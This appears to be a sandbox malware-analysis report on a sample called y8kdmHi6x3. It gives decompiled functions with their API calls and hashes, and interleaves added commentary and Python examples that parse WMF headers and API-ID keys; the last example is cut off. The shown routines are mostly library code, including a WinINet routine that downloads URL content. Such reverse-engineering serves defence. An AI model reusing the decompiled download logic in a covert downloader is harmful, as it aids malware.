                                                    • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                    • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
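E004288B4 zero-fills a 0x16-byte structure, stores 0x9AC6CDD7 at its start, scales the metafile's width and height with MulDiv(value, inch, 0x9EC) where inch defaults to 0x60 when the metafile carries none, stores a 16-bit value computed by E00426DA8 at the end of the structure, and then writes the structure followed by the GetWinMetaFileBits output. 0x9AC6CDD7 is the key of the Aldus placeable metafile (APM) header, 0x9EC is 2540 HIMETRIC units per inch, 0x60 is 96 dpi and the APM trailer is an XOR checksum of the preceding ten words, so this is a placeable-WMF writer (the checksum routine is an assumption from the field position; the report does not name it). The block below is an added example, not sample code: it builds the 22-byte header the same way and, more usefully for a reviewer of WMF parsers, validates one before the records behind it are trusted.

```python
"""Build and validate the 22-byte Aldus placeable metafile header that E004288B4
emits ahead of the WMF bits. Added example for this report; the constants are
taken from the listing (0x9AC6CDD7, 0x16, MulDiv(..., 2540), default inch 0x60),
the field layout is the documented APM header."""
import struct

APM_KEY = 0x9AC6CDD7          # placeable WMF magic, stored little-endian
HIMETRIC_PER_INCH = 2540      # the 0x9EC in both MulDiv calls
DEFAULT_INCH = 0x60           # 96 dpi fallback when the metafile has no inch value
HEADER_SIZE = 0x16            # 22 bytes, zero-filled before use
_FMT = "<IHhhhhHIH"           # key, hmf, left, top, right, bottom, inch, reserved, checksum


def mul_div(number, numerator, denominator):
    """Port of KERNEL32 MulDiv: wide intermediate, rounding half away from zero,
    -1 on division by zero."""
    if denominator == 0:
        return -1
    product = number * numerator
    half = abs(denominator) // 2
    magnitude = (abs(product) + half) // abs(denominator)
    return -magnitude if (product < 0) != (denominator < 0) else magnitude


def apm_checksum(header):
    """XOR of the first ten 16-bit words, i.e. everything before the checksum field."""
    chk = 0
    for word in struct.unpack("<10H", header[:20]):
        chk ^= word
    return chk


def build_placeable_header(width_himetric, height_himetric, inch=0):
    """Same arithmetic as the listing: inch defaults to 0x60, width/height are
    converted from HIMETRIC to metafile units with MulDiv, bbox origin is 0,0."""
    inch = inch if inch != 0 else DEFAULT_INCH
    right = mul_div(width_himetric, inch & 0xFFFF, HIMETRIC_PER_INCH)
    bottom = mul_div(height_himetric, inch & 0xFFFF, HIMETRIC_PER_INCH)
    body = struct.pack("<IHhhhhHI", APM_KEY, 0, 0, 0, right, bottom, inch, 0)
    return body + struct.pack("<H", apm_checksum(body))


def parse_placeable_header(blob):
    """Validate an APM header before trusting the WMF records that follow it:
    magic, checksum, non-zero inch and a sane bounding box."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("short header")
    key, hmf, left, top, right, bottom, inch, reserved, checksum = struct.unpack(_FMT, blob[:HEADER_SIZE])
    if key != APM_KEY:
        raise ValueError("not a placeable metafile (key 0x%08x)" % key)
    if apm_checksum(blob[:HEADER_SIZE]) != checksum:
        raise ValueError("checksum mismatch")
    if inch == 0 or right < left or bottom < top:
        raise ValueError("implausible inch or bounding box")
    return {
        "bbox": (left, top, right, bottom),
        "inch": inch,
        "width_himetric": mul_div(right - left, HIMETRIC_PER_INCH, inch),
        "height_himetric": mul_div(bottom - top, HIMETRIC_PER_INCH, inch),
    }
```

The parser refuses headers whose checksum does not match, which is the cheap check that distinguishes a genuine APM header from 22 bytes that merely start with the magic; the width/height round trip is lossy by design because MulDiv rounds.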

                                                    C-Code - Quality: 59%
                                                    			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                    				void* _v8;
                                                    				void* _v12;
                                                    				long _v16;
                                                    				void _v1042;
                                                    				char _v1048;
                                                    				void* _t47;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				void* _t60;
                                                    				void* _t62;
                                                    				void* _t63;
                                                    				intOrPtr _t64;
                                                    
                                                    				_t62 = _t63;
                                                    				_t64 = _t63 + 0xfffffbec;
                                                    				_v1048 = 0;
                                                    				_t47 = __edx;
                                                    				_t60 = __eax;
                                                    				_push(_t62);
                                                    				_push(0x4750fb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t64;
                                                    				E004049C0(__edx);
                                                    				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
                                                    				_push(_t62);
                                                    				_push(0x4750db);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t64;
                                                    				if(_v8 == 0) {
                                                    					L6:
                                                    					_pop(_t55);
                                                    					 *[fs:eax] = _t55;
                                                    					_push(0x4750e2);
                                                    					return InternetCloseHandle(_v8);
                                                    				} else {
                                                    					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
                                                    					if(_v12 == 0) {
                                                    						goto L6;
                                                    					} else {
                                                    						_push(_t62);
                                                    						_push(0x4750bd);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t64;
                                                    						while(1) {
                                                    							_v16 = 0x400;
                                                    							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
                                                    							if(_v16 == 0) {
                                                    								break;
                                                    							}
                                                    							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
                                                    							E00404C30( &_v1048, 0x402,  &_v1042);
                                                    							E00404C88(_t47, _v1048);
                                                    						}
                                                    						_pop(_t56);
                                                    						 *[fs:eax] = _t56;
                                                    						_push(0x4750c4);
                                                    						return InternetCloseHandle(_v12);
                                                    					}
                                                    				}
                                                    			}

                                                    0x00474fc1
                                                    0x00474fc3
                                                    0x00474fcd
                                                    0x00474fd3
                                                    0x00474fd5
                                                    0x00474fd9
                                                    0x00474fda
                                                    0x00474fdf
                                                    0x00474fe2
                                                    0x00474fe7
                                                    0x00474ffe
                                                    0x00475003
                                                    0x00475004
                                                    0x00475009
                                                    0x0047500c
                                                    0x00475013
                                                    0x004750c4
                                                    0x004750c6
                                                    0x004750c9
                                                    0x004750cc
                                                    0x004750da
                                                    0x00475019
                                                    0x00475035
                                                    0x0047503c
                                                    0x00000000
                                                    0x00475042
                                                    0x00475044
                                                    0x00475045
                                                    0x0047504a
                                                    0x0047504d
                                                    0x00475050
                                                    0x00475050
                                                    0x0047506b
                                                    0x00475074
                                                    0x00000000
                                                    0x00000000
                                                    0x00475079
                                                    0x00475092
                                                    0x0047509f
                                                    0x0047509f
                                                    0x004750a8
                                                    0x004750ab
                                                    0x004750ae
                                                    0x004750bc
                                                    0x004750bc
                                                    0x0047503c

                                                    APIs
                                                    • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: MyApp
                                                    • API String ID: 3121278467-2115267534
                                                    • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                    • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 56%
                                                    			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				intOrPtr _t9;
                                                    				void* _t11;
                                                    				intOrPtr _t17;
                                                    				void* _t28;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				intOrPtr _t37;
                                                    				struct HINSTANCE__* _t41;
                                                    				void* _t43;
                                                    				intOrPtr _t45;
                                                    				intOrPtr _t46;
                                                    
                                                    				_t45 = _t46;
                                                    				_push(__ebx);
                                                    				_t43 = __edx;
                                                    				_t28 = __eax;
                                                    				if( *0x49eba0 == 0) {
                                                    					 *0x49eba0 = L0040D9DC("comctl32.dll", __eax);
                                                    					if( *0x49eba0 >= 0x60000) {
                                                    						_t41 = GetModuleHandleA("comctl32.dll");
                                                    						if(_t41 != 0) {
                                                    							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
                                                    						}
                                                    					}
                                                    				}
                                                    				_v8 = E00422634(_t43, 1, 0);
                                                    				_push(_t45);
                                                    				_push(0x448ebe);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t46;
                                                    				if( *0x49eba4 == 0) {
                                                    					_t9 = _v8;
                                                    					if(_t9 != 0) {
                                                    						_t9 = _t9 - 0xffffffec;
                                                    					}
                                                    					_push(_t9);
                                                    					_t11 = L00447D0C(_t28);
                                                    					_push(_t11);
                                                    					L0042C4AC();
                                                    					if(_t11 == 0) {
                                                    						_t33 =  *0x49d9c8; // 0x422f10
                                                    						E0040D200(_t33, 1);
                                                    						E00404378();
                                                    					}
                                                    				} else {
                                                    					_t17 = _v8;
                                                    					if(_t17 != 0) {
                                                    						_t17 = _t17 - 0xffffffec;
                                                    					}
                                                    					_push(_t17);
                                                    					_push(1);
                                                    					_push(L00447D0C(_t28));
                                                    					if( *0x49eba4() != 0) {
                                                    						_t34 =  *0x49d9c8; // 0x422f10
                                                    						E0040D200(_t34, 1);
                                                    						E00404378();
                                                    					}
                                                    				}
                                                    				_pop(_t37);
                                                    				 *[fs:eax] = _t37;
                                                    				_push(0x448ec5);
                                                    				return L00403BEC(_v8);
                                                    			}

                                                    0x00448dc5
                                                    0x00448dc8
                                                    0x00448dcb
                                                    0x00448dcd
                                                    0x00448dd6
                                                    0x00448de2
                                                    0x00448df1
                                                    0x00448dfd
                                                    0x00448e01
                                                    0x00448e0e
                                                    0x00448e0e
                                                    0x00448e01
                                                    0x00448df1
                                                    0x00448e23
                                                    0x00448e28
                                                    0x00448e29
                                                    0x00448e2e
                                                    0x00448e31
                                                    0x00448e3b
                                                    0x00448e75
                                                    0x00448e7a
                                                    0x00448e7c
                                                    0x00448e7c
                                                    0x00448e7f
                                                    0x00448e82
                                                    0x00448e87
                                                    0x00448e88
                                                    0x00448e8f
                                                    0x00448e91
                                                    0x00448e9e
                                                    0x00448ea3
                                                    0x00448ea3
                                                    0x00448e3d
                                                    0x00448e3d
                                                    0x00448e42
                                                    0x00448e44
                                                    0x00448e44
                                                    0x00448e47
                                                    0x00448e48
                                                    0x00448e51
                                                    0x00448e5a
                                                    0x00448e5c
                                                    0x00448e69
                                                    0x00448e6e
                                                    0x00448e6e
                                                    0x00448e5a
                                                    0x00448eaa
                                                    0x00448ead
                                                    0x00448eb0
                                                    0x00448ebd

                                                    APIs
                                                      • Part of subcall function 0040D9DC: 73E714E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                      • Part of subcall function 0040D9DC: 73E714C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                      • Part of subcall function 0040D9DC: 73E71500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                    • 739F1DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714$AddressE71500HandleModuleProc
                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                    • API String ID: 314815179-3125200627
                                                    • Opcode ID: 9877ba2feab42bf383620ac1d30c79253930dce336abfba371b7d8290d564408
                                                    • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                    • Opcode Fuzzy Hash: 9877ba2feab42bf383620ac1d30c79253930dce336abfba371b7d8290d564408
                                                    • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92d != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					_t26 =  *0x49e914; // 0x42c900
                                                    					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
                                                    					_t24 =  *0x49e914(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}

                                                    0x0042c909
                                                    0x0042c90c
                                                    0x0042c916
                                                    0x0042c93b
                                                    0x0042c943
                                                    0x0042c963
                                                    0x0042c968
                                                    0x0042c973
                                                    0x0042c97e
                                                    0x0042c988
                                                    0x0042c989
                                                    0x0042c98a
                                                    0x0042c98b
                                                    0x0042c98c
                                                    0x0042c98d
                                                    0x0042c997
                                                    0x0042c999
                                                    0x0042c9a1
                                                    0x0042c9a2
                                                    0x0042c9a2
                                                    0x0042c9a7
                                                    0x0042c9a7
                                                    0x0042c918
                                                    0x0042c91d
                                                    0x0042c92a
                                                    0x0042c937
                                                    0x0042c937
                                                    0x0042c9b1

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                    • GetSystemMetrics.USER32 ref: 0042C96D
                                                    • GetSystemMetrics.USER32 ref: 0042C978
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                    • API String ID: 2545840971-1370492664
                                                    • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                    • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92e != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					_t26 =  *0x49e918; // 0x42c9d4
                                                    					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
                                                    					_t24 =  *0x49e918(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}

                                                    0x0042c9dd
                                                    0x0042c9e0
                                                    0x0042c9ea
                                                    0x0042ca0f
                                                    0x0042ca17
                                                    0x0042ca37
                                                    0x0042ca3c
                                                    0x0042ca47
                                                    0x0042ca52
                                                    0x0042ca5c
                                                    0x0042ca5d
                                                    0x0042ca5e
                                                    0x0042ca5f
                                                    0x0042ca60
                                                    0x0042ca61
                                                    0x0042ca6b
                                                    0x0042ca6d
                                                    0x0042ca75
                                                    0x0042ca76
                                                    0x0042ca76
                                                    0x0042ca7b
                                                    0x0042ca7b
                                                    0x0042c9ec
                                                    0x0042c9f1
                                                    0x0042c9fe
                                                    0x0042ca0b
                                                    0x0042ca0b
                                                    0x0042ca85

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                    • GetSystemMetrics.USER32 ref: 0042CA41
                                                    • GetSystemMetrics.USER32 ref: 0042CA4C
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                    • API String ID: 2545840971-2774842281
                                                    • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                    • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				struct HDC__* _v12;
                                                    				struct HDC__* _v16;
                                                    				void* _v20;
                                                    				struct tagRGBQUAD _v1044;
                                                    				int _t16;
                                                    				int _t37;
                                                    				intOrPtr _t44;
                                                    				void* _t46;
                                                    				void* _t49;
                                                    				void* _t51;
                                                    				intOrPtr _t52;
                                                    
                                                    				_t16 = __eax;
                                                    				_t49 = _t51;
                                                    				_t52 = _t51 + 0xfffffbf0;
                                                    				_v8 = __edx;
                                                    				_t46 = __eax;
                                                    				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                    					L4:
                                                    					return _t16;
                                                    				} else {
                                                    					_t16 = E004267F4(_v8, 0xff,  &_v1044);
                                                    					_t37 = _t16;
                                                    					if(_t37 == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_v12 = GetDC(0);
                                                    						_v16 = CreateCompatibleDC(_v12);
                                                    						_v20 = SelectObject(_v16, _t46);
                                                    						_push(_t49);
                                                    						_push(0x428fe7);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t52;
                                                    						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                                                    						_pop(_t44);
                                                    						 *[fs:eax] = _t44;
                                                    						_push(0x428fee);
                                                    						SelectObject(_v16, _v20);
                                                    						DeleteDC(_v16);
                                                    						return ReleaseDC(0, _v12);
                                                    					}
                                                    				}
                                                    			}

                                                    0x00428f38
                                                    0x00428f39
                                                    0x00428f3b
                                                    0x00428f43
                                                    0x00428f46
                                                    0x00428f4a
                                                    0x00428fee
                                                    0x00428ff3
                                                    0x00428f5b
                                                    0x00428f69
                                                    0x00428f6e
                                                    0x00428f72
                                                    0x00000000
                                                    0x00428f74
                                                    0x00428f7b
                                                    0x00428f87
                                                    0x00428f94
                                                    0x00428f99
                                                    0x00428f9a
                                                    0x00428f9f
                                                    0x00428fa2
                                                    0x00428fb3
                                                    0x00428fba
                                                    0x00428fbd
                                                    0x00428fc0
                                                    0x00428fcd
                                                    0x00428fd6
                                                    0x00428fe6
                                                    0x00428fe6
                                                    0x00428f72

                                                    APIs
                                                      • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                      • Part of subcall function 004267F4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042682E
                                                    • GetDC.USER32(00000000), ref: 00428F76
                                                    • CreateCompatibleDC.GDI32(?), ref: 00428F82
                                                    • SelectObject.GDI32(?), ref: 00428F8F
                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                    • SelectObject.GDI32(?,?), ref: 00428FCD
                                                    • DeleteDC.GDI32(?), ref: 00428FD6
                                                    • ReleaseDC.USER32 ref: 00428FE1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                    • String ID:
                                                    • API String ID: 4046155103-0
                                                    • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                    • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00458714(long __eax, void* __ecx, short __edx) {
                                                    				struct tagPOINT _v24;
                                                    				long _t7;
                                                    				long _t12;
                                                    				long _t19;
                                                    				void* _t21;
                                                    				struct HWND__* _t27;
                                                    				short _t28;
                                                    				void* _t30;
                                                    				struct tagPOINT* _t31;
                                                    
                                                    				_t21 = __ecx;
                                                    				_t7 = __eax;
                                                    				_t31 = _t30 + 0xfffffff8;
                                                    				_t28 = __edx;
                                                    				_t19 = __eax;
                                                    				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                    					L6:
                                                    					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                    				} else {
                                                    					 *((short*)(__eax + 0x44)) = __edx;
                                                    					if(__edx != 0) {
                                                    						L5:
                                                    						_t7 = SetCursor(E004586EC(_t19, _t28));
                                                    						goto L6;
                                                    					} else {
                                                    						GetCursorPos(_t31);
                                                    						_push(_v24.y);
                                                    						_t27 = WindowFromPoint(_v24);
                                                    						if(_t27 == 0) {
                                                    							goto L5;
                                                    						} else {
                                                    							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                    							if(_t12 != GetCurrentThreadId()) {
                                                    								goto L5;
                                                    							} else {
                                                    								_t7 = SendMessageA(_t27, 0x20, _t27, L004079D0(SendMessageA(_t27, 0x84, 0, L00407A64(_t31, _t21)), 0x200));
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t7;
                                                    			}
                                                    Address column (one entry per line of the C-code above): 0x00458714 0x00458714 0x00458718 0x0045871b 0x0045871d 0x00458723 0x00458798 0x00458798 0x00458725 0x00458725 0x0045872c 0x00458788 0x00458793 0x00000000 0x0045872e 0x0045872f 0x00458734 0x00458741 0x00458745 0x00000000 0x00458747 0x0045874a 0x00458758 0x00000000 0x0045875a 0x00458781 0x00458781 0x00458758 0x00458745 0x0045872c 0x004587a1

                                                    APIs
                                                    • GetCursorPos.USER32 ref: 0045872F
                                                    • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                    • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                    • SetCursor.USER32(00000000), ref: 00458793
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                    • String ID:
                                                    • API String ID: 1770779139-0
                                                    • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                    • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
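The "API ID" line under Similarity (for the two functions above: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable and CursorMessageSendThreadWindow$CurrentFromPointProcess) is a bag-of-words key built from the function's API list, which is what lets an analyst match the same library routine across reports even when addresses and fuzzy hashes differ. The script below is an added example, not Joe Sandbox code, that parses the report's "APIs" bullets and rebuilds that key. The grouping rule it uses is an assumption inferred from the API ID lines on this page, not a documented Joe Sandbox algorithm: split each API name into CamelCase words, drop words of three characters or fewer (Get, Set, DC, DIB, Id, Pos and the ANSI suffix A all vanish), group words by how many listed calls contain them, most frequent group first, join groups with "$" and sort words inside a group alphabetically. The sample input is copied from the two "APIs" blocks above.

```python
import re
from collections import Counter

# One "APIs" bullet as printed in the report, for example
#   • GetDC.USER32(00000000), ref: 00428F76
#   • ReleaseDC.USER32 ref: 00428FE1
#   • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)

# CamelCase splitter: an all-caps run not followed by a lowercase letter
# (DC, DIB, the trailing A of an ANSI entry point) is a word of its own.
CAMEL = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z0-9]*")

# Assumption inferred from this page: words shorter than four characters
# (Get, Set, DC, DIB, Id, Pos, A) do not appear in the API ID.
MIN_WORD = 4


def parse_api_lines(text):
    """Return one dict {sub, api, module, args, ref} per bullet that parses."""
    calls = []
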